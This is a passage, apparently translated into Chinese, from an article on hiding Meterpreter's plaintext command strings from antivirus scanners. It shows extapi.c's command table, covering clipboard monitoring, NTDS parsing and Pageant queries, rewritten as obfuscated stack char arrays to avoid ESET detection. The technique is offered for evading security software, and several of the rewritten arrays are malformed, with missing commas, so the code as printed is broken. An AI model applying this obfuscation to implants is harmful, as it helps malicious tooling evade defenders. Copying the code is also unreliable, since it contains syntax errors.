在看不见的幕后，第一个代码片段使字符串ntdll存储在生成的二进制文件的.rdata段内，并且防病毒程序很容易发现该字符串 。第二个片段是字符串在运行时存储在堆栈中，并且在通常情况下与代码在静态上无法区分 。IDA Pro或替代产品通常能够识别字符串，但它们也需要对二进制文件运行更高级且计算量更大的分析 。
 
列表初始化在Meterpreter的代码库中，可以在几个文件中找到这种构造，例如在c/meterpreter/source/extensions/extapi/extapi.c 中：
Command customCommands[] ={COMMAND_REQ("extapi_window_enum", request_window_enum),COMMAND_REQ("extapi_service_enum", request_service_enum),COMMAND_REQ("extapi_service_query", request_service_query),COMMAND_REQ("extapi_service_control", request_service_control),COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),COMMAND_REQ("extapi_clipboard_monitor_start", request_clipboard_monitor_start),COMMAND_REQ("extapi_clipboard_monitor_pause", request_clipboard_monitor_pause),COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),COMMAND_REQ("extapi_clipboard_monitor_purge", request_clipboard_monitor_purge),COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),COMMAND_REQ("extapi_ntds_parse", ntds_parse),COMMAND_REQ("extapi_wmi_query", request_wmi_query),COMMAND_REQ("extapi_pageant_send_query", request_pageant_send_query),...}这些字符串以明文形式存储在ext_server_espia.x64.dll的.rdata节中，并由ESET Nod32进行选择 。
更糟糕的是，这些字符串是位于列表初始化程序中的宏的参数 。这引入了很多棘手的案例，但这些案例并不需要关心 。我们的目的是自动重写此代码段，如下所示：
char hid_extapi_UQOoNXigAPq4[] = {'e','x','t','a','p','i','_','w','i','n','d','o','w','_','e','n','u','m',0};char hid_extapi_vhFHmZ8u2hfz[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','e','n','u','m',0};char hid_extapi_pW25eeIGBeru[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','q','u','e','r','y'0};char hid_extapi_S4Ws57MYBjib[] = {'e','x','t','a','p','i','_','s','e','r','v','i','c','e','_','c','o','n','t','r''o','l',0};char hid_extapi_HJ0lD9Dl56A4[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','g','e','t''_','d','a','t','a',0};char hid_extapi_IiEzXils3UsR[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','s','e','t''_','d','a','t','a',0};char hid_extapi_czLOBo0HcqCP[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n''i','t','o','r','_','s','t','a','r','t',0};char hid_extapi_WcWbTrsQujiT[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n''i','t','o','r','_','p','a','u','s','e',0};char hid_extapi_rPiFTZW4ShwA[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n''i','t','o','r','_','r','e','s','u','m','e',0};char hid_extapi_05fAoaZLqOoy[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n''i','t','o','r','_','p','u','r','g','e',0};char hid_extapi_cOOyHTPTvZGK[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','s','t','o','p',0};char hid_extapi_smtmvW05cI9y[] = {'e','x','t','a','p','i','_','c','l','i','p','b','o','a','r','d','_','m','o','n','i','t','o','r','_','d','u','m','p',0};char hid_extapi_01kuYCM8z49k[] = {'e','x','t','a','p','i','_','a','d','s','i','_','d','o','m','a','i','n','_','q','u','e','r','y',0};char hid_extapi_SMK9uFj6nThk[] = {'e','x','t','a','p','i','_','n','t','d','s','_','p','a','r','s','e',0};char hid_extapi_PHxnGM7M0609[] = {'e','x','t','a','p','i','_','w','m','i','_','q','u','e','r','y',0};char hid_extapi_J7EGS6FRHwkV[] = {'e','x','t','a','p','i','_','p','a','g','e','a','n','t','_','s','e','n','d','_','q','u','e','r','y',0};Command customCommands[] ={COMMAND_REQ(hid_extapi_UQOoNXigAPq4, request_window_enum),COMMAND_REQ(hid_extapi_vhFHmZ8u2hfz, request_service_enum),COMMAND_REQ(hid_extapi_pW25eeIGBeru, request_service_query),COMMAND_REQ(hid_extapi_S4Ws57MYBjib, request_service_control),COMMAND_REQ(hid_extapi_HJ0lD9Dl56A4, request_clipboard_get_data),COMMAND_REQ(hid_extapi_IiEzXils3UsR, request_clipboard_set_data),COMMAND_REQ(hid_extapi_czLOBo0HcqCP, request_clipboard_monitor_start),COMMAND_REQ(hid_extapi_WcWbTrsQujiT, request_clipboard_monitor_pause),COMMAND_REQ(hid_extapi_rPiFTZW4ShwA, request_clipboard_monitor_resume),COMMAND_REQ(hid_extapi_05fAoaZLqOoy, request_clipboard_monitor_purge),COMMAND_REQ(hid_extapi_cOOyHTPTvZGK, request_clipboard_monitor_stop),COMMAND_REQ(hid_extapi_smtmvW05cI9y, request_clipboard_monitor_dump),COMMAND_REQ(hid_extapi_01kuYCM8z49k, request_adsi_domain_query),COMMAND_REQ(hid_extapi_SMK9uFj6nThk, ntds_parse),COMMAND_REQ(hid_extapi_PHxnGM7M0609, request_wmi_query),COMMAND_REQ(hid_extapi_J7EGS6FRHwkV, request_pageant_send_query),COMMAND_TERMINATOR};